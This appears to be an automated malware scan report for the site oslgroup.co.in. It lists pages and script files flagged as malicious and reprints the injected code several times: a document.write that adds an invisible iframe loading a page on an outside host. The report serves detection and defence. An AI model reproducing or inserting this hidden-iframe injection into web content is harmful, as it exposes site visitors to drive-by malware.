Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oslgroup.co.in
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.oslgroup.co.in/ | 200 OK Content-Length: 24205 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>'); Antivirus reports:
| ||
http://www.oslgroup.co.in/js/dropdown.js | 200 OK Content-Length: 480 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function hoverOn(){ var menu = document.getElementById("show"); menu.style.visibility ='visible'; } function hoverOff(){ var menu = document.getElementById("show"); menu.style.visibility = 'hidden'; } document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>'); Antivirus reports:
| ||
http://www.oslgroup.co.in/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8272 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>'); Antivirus reports:
| ||
http://www.oslgroup.co.in/contact.php | 200 OK Content-Length: 13012 Content-Type: text/html | clean |
http://www.oslgroup.co.in/osl-logistic/network.html | 200 OK Content-Length: 6697 Content-Type: text/html | clean |
http://www.oslgroup.co.in/osl-logistic/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8272 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>'); Antivirus reports:
| ||
http://www.oslgroup.co.in/osl-logistic/js/dropdown.js | 200 OK Content-Length: 496 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function hoverOn(fieldId){ var menu = document.getElementById(fieldId); menu.style.visibility ='visible'; } function hoverOff(fieldId){ var menu = document.getElementById(fieldId); menu.style.visibility = 'hidden'; } document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>'); Antivirus reports:
| ||
http://l.yimg.com/t/smb/js/geov2.js | 200 OK Content-Length: 648 Content-Type: text/javascript | clean |
http://www.oslgroup.co.in/osl-logistic/index.html | 200 OK Content-Length: 22570 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>'); Antivirus reports:
| ||
http://www.oslgroup.co.in/aboutus.php | 200 OK Content-Length: 24881 Content-Type: text/html | clean |
http://www.oslgroup.co.in/index.php | 200 OK Content-Length: 24205 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>'); Antivirus reports:
| ||
http://www.oslgroup.co.in/osl-logistic/ | 200 OK Content-Length: 22570 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>'); Antivirus reports:
| ||
http://www.oslgroup.co.in/osl-logistic/carcareer.html | 200 OK Content-Length: 10037 Content-Type: text/html | clean |
http://www.oslgroup.co.in/osl-logistic/js/crawler.js | 200 OK Content-Length: 10067 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function marqueeInit(config){ if(!document.createElement) return; marqueeInit.ar.push(config); marqueeInit.run(config.uniqueid); } (function(){ if(!document.createElement) return; marqueeInit.ar = []; document.write('<style type="text/css">.marquee{white-space:nowrap;overflow:hidden;visibility:hidden;}' + '#marq_kill_marg_bord{border:none!important;margin:0!important;}<\/style>'); var c = 0, tTRE = [new RegExp('^\\s*$'), new RegExp('^\\ } } } if (window.addEventListener) window.addEventListener('resize', resize, false); else if (window.attachEvent) window.attachEvent('onresize', resize); })(); document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>'); Antivirus reports:
| ||
http://www.oslgroup.co.in/osl-logistic/warehousing.html | 200 OK Content-Length: 11214 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: oslgroup.co.in
Result:
GET / HTTP/1.1
Host: oslgroup.co.in
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: oslgroup.co.in
Referer: http://www.google.com/search?q=oslgroup.co.in
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: oslgroup.co.in
Referer: http://www.google.com/search?q=oslgroup.co.in
Result:
The result is similar to the first query. There are no suspicious redirects found.